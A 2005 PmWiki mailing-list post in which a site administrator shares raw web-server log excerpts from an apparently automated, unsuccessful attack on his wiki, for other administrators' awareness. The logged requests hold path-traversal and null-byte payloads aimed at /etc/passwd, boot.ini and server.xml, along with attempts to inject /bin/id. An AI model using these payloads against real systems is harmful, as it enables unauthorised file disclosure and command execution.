[pmwiki-users] attack log

Thu Mar 24 09:57:46 CST 2005

My wiki was attacked yesterday, unsuccessfully it seems, but the 
attack was sufficiently strange that I thought I'd share.  There's 
megabytes of this in the logs -- it was apparently an automatic 
attack, and I can't tell if it's targeting Windows or Linux or both.

Anyway,  let's be aware -- one of Pmwiki's strengths is its simplicty, 
which makes it easier to secure.  But the overall system can get 
pretty funky, with PHP and Apache and cookbooks and other strange, 
interacting stuff.

(Just the other day I discovered that one of my simple, seemingly 
harmless HTML/PHP/MySQL forms was vulnerable to an SQL injection 
attack, because the script was _too_ simple and didn't do proper 
quoting/sanitizing of user input; the attacks below are hoping there 
are similar problems in Pmwiki.)

/meglab/User/Discussion?action=upload&upname=%00../../../../../../etc/passwd 
HTTP Response 200

/meglab/Main/SearchWiki?action=/../../../../../../../../../../../boot.ini%00.html 
HTTP Response 200

/meglab/Main/MegOverview?action=/../../../../../../../../../../etc/passwd 
HTTP Response 200

/meglab?pagename=/../../../../../../../../../../../etc/passwd%00.html&q=FormFillText 
HTTP Response 302

/meglab/Meg/References?action=/../../../../../../../../../../../boot.ini%00.jpg&restore=diff:1106002277:1106002259:minor 
HTTP Response 200

/meglab/User/User?action=/../../../../../../../../../../../boot.ini%00&restore=diff:1107559271:1106022750:edit&restore=diff:1107559271:1106022750:' 
HTTP Response 200

/meglab/Meg/Parsemarks2?action=/../../../../../../../../bin/id|&template=Software.Template 
HTTP Response 200
  /meglab/Meg/AFNIMaskCreation?action=/../../../../../../../../%2A 
HTTP Response 200

/meglab/PmWiki/DocumentationIndex?action=%00../../../../../../etc/passwd 
HTTP Response 200

/meglab/Meg/References?action=edit&restore=/../../../../../../../../../../../boot.ini%00 
HTTP Response 200

/meglab/User/Meetings?action=edit&restore=/../../../../../../../../../../../boot.ini%00.html 
HTTP Response 200

/meglab/User/Programming?action=diff&source=%00../../../../../../etc/passwd&minor=n 
HTTP Response 200

/meglab/Meg/Meg?action=/../../../../../../../../bin/id|&upname=moo.txt 
HTTP Response 200

/meglab/Profiles/Fred?action=/../../../../../../../../../../../boot.ini%00.jpg 
HTTP Response 200

/meglab/Main/MegFacility?action=/../../../../../../../../bin/id|&source=n&minor=n 
HTTP Response 200

/meglab/Meg/Parsemarks2?action=/../../../../../../../../../../../boot.ini%00&template=Software.Template 
HTTP Response 200

/meglab/User/Meetings?action=/../../../../../../../../../../../etc/passwd%00.html&restore=diff:1111505282:1110827145: 
HTTP Response 200

/meglab/Meg/Samslide?action=diff&source=n&minor=/../../../../../../../../bin/id| 
HTTP Response 200
  /meglab/Meg/ScriptingBasics?action=/../../../../../../../../%2A HTTP 
Response 200

/meglab/Meg/Parsemarks2?action=/../../../../../../../../../../../boot.ini%00.html&template=Software.Template 
HTTP Response 200

/meglab/Meg/Basics?action=/../../../../../../../../%2A&source=y&minor=y 
HTTP Response 200

/meglab/Meg/Manuals?action=upload&upname=Variance%20Document.docupload&upname=/../../../../../../../../%2A 
HTTP Response 200

/meglab/Main/OlderNews?action=edit&restore=%00../../../../../../etc/passwd 
HTTP Response 200

/meglab/Meg/CTFSoftwareInstallation?action=/../../../../../../../../%2A&restore=diff:1109179963:1107550181: 
HTTP Response 200

/meglab/Meg/SAMOutput?action=diff&source=n&minor=/../../../../../../../../../../../boot.ini 
HTTP Response 200

/meglab/Meg/VirtualChannel?action=/../../../../../../../../../../../boot.ini%00.html 
HTTP Response 200

/meglab/HandednessQuestionnaire/Doc?action=/../../../../../../../../%2A 
HTTP Response 200

/meglab/User/PastMeetings?action=/../../../../../../../../../../../boot.ini%00&source=y&minor=y 
HTTP Response 200

/meglab/PmWiki/PmWiki?action=diff&source=n&minor=%00../../../../../../etc/passwd 
HTTP Response 200
  /meglab/Meg/Megst?action=%00../../../../../../etc/passwd HTTP 
Response 200

/meglab/Main/LabStatus?action=/../../../../../../../../%2A&restore=diff:1106004175:1106004175: 
HTTP Response 200

/meglab/Meg/3dNormalize?action=diff&source=n&minor=/../../../../../../../../bin/id| 
HTTP Response 200

/meglab/Main/MegFacility?action=diff&source=/../../../../../../../../../../etc/passwd^^&minor=n 
HTTP Response 200

/meglab/Meg/RedHat8Install?action=edit&restore=/../../../../../../../../../../../etc/passwd%00.html 
HTTP Response 200

/meglab/Main/AllRecentChanges?action=edit&restore=/../../../../../../../../../../../boot.ini 
HTTP Response 200

/meglab/Main/HomePage?action=/../../../../../../../../../../../boot.ini&restore=diff:1110519104:1110457528: 
HTTP Response 200

/meglab/Meg/VirtualChannels?action=/../../../../../../../../../../../boot.ini%00.jpg 
HTTP Response 200
  /meglab/Samslide/Py?action=/../../../../../../../../bin/id| HTTP 
Response 200
  /meglab/User/Quality?action=%00../../../../../../etc/passwd HTTP 
Response 200

/meglab/Main/SearchWiki?action=diff&source=../../../../../../../../conf/server.xml&minor=n 
HTTP Response 200

/meglab/Profiles/Tomh?action=/../../../../../../../../../../../boot.ini%00&source=n&minor=n 
HTTP Response 200

/meglab/Meg/LocalSpheres?action=/../../../../../../../../../../../boot.ini%00 
HTTP Response 200

/meglab/Meg/LocalSpheres?action=/../../../../../../../../../../../boot.ini%00.jpg 
HTTP Response 200

/meglab/User/Discussion?action=edit&restore=/../../../../../../../../%2A 
HTTP Response 200

/meglab/Flub/WikiWord?action=/../../../../../../../../../../etc/passwd 
HTTP Response 200

/meglab/Main/SideBar?action=/../../../../../../../../../../../boot.ini%00.html 
HTTP Response 200

/meglab/Meg/GroupAnalysis?action=/../../../../../../../../../../../etc/passwd%00.jpg 
HTTP Response 200

/meglab/Meg/FrequentlyAskedQuestions?action=diff&source=n&minor=/../../../../../../../../bin/id| 
HTTP Response 200
-- 
Dr. Tom Holroyd
"A man of genius makes no mistakes. His errors are volitional and
are the portals of discovery." -- James Joyce